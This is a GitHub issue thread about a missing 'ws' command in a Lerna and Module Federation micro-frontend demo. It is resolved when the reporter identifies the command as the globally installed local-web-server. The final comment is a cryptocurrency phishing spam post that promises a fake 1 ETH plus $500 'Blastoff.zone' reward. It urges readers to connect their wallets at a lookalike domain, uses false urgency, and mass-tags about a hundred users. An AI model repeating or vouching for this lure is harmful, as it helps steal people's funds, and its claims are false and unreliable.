### ISSUE TITLE
 ws: command not found

### ISSUE THREAD

**Issue by akserg** [MichalZalecki/microfrontend-lerna-module-federation#1]
Hi Michael,

Thank you for sharing your knowledge in the [article](https://michalzalecki.com/micro-frontends-module-federation-monorepo/) and code here. 
I cloned your project and followed instructions until `Single remote production build` where I was stuck because of an error in `yarn single:start`:

```
yarn run v1.22.10
$ ws -d build --spa index.html --port 8080 -z
/bin/sh: ws: command not found
```

I didn't find package `ws`. What is it?

**Comment by akserg** [comment]
Ah, I figured it out - you are using [local-web-server](https://github.com/lwsjs/local-web-server) for local development installed globally.

**Comment by MichalZalecki** [comment]
@akserg thanks, I'll update the article so that's clear

**Comment by jalixdesign** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
mohsenusr, @Liehu, @tchigher, @Endogen, @binaryer, @spinachwh, @renmengkai, @lin0kin, @chenxiqiyuan, @cityO, @AiKoSoSuBeTe, @jasoncool520, @OrAsaf, @Ziyan0829, @oguzhankiyar, @unicorn343, @retr0bot, @henrytriplette, @Aleksey3107, @lanimei, @lpirola, @winnerineast, @diego95root, @umi, @Maria60m, @ZsoltGergely, @micmelesse, @mayl8822, @root-couture, @clashic, @huyyeegz, @limbolily, @xjodoin, @gamebusterz, @softlns, @williamfgoncalves, @AdderChen, @jaychoo, @shyangs, @kirecek, @PEShine, @lovejackal, @cloudqq, @apprisi, @EastonLee, @ygxxii, @DY20202, @thoughtstirring, @arunsunner, @Dkaishujkanalakis, @h1nk, @GhostLee, @chobotnice007, @lyridious, @adadpk, @caithreecows, @euljr, @a690700752, @changvvb, @eallion, @zhihaofans, @mauris, @roscopecoltran, @llj098, @44667788, @G4Zz0L1, @memset0, @popstk, @icandura, @yohayoha, @CmderQ, @obedientgoyim, @yukselberkay, @stoikerty, @Cree0618, @NIFR91, @AlphaXyXy, @BaRRaKudaRain, @SkyGazerDK, @Hallock, @tellYanze, @mishankov, @manami19840419, @xxlv, @MAction, @mercer08, @josemyg, @yingran-cn, @gugadev, @Chinayuan, @freerafiki, @volpato30, @windhc, @laztb9, @h-j-13, @SR-G, @wnadgob, @luisgbyte, @yzzymt
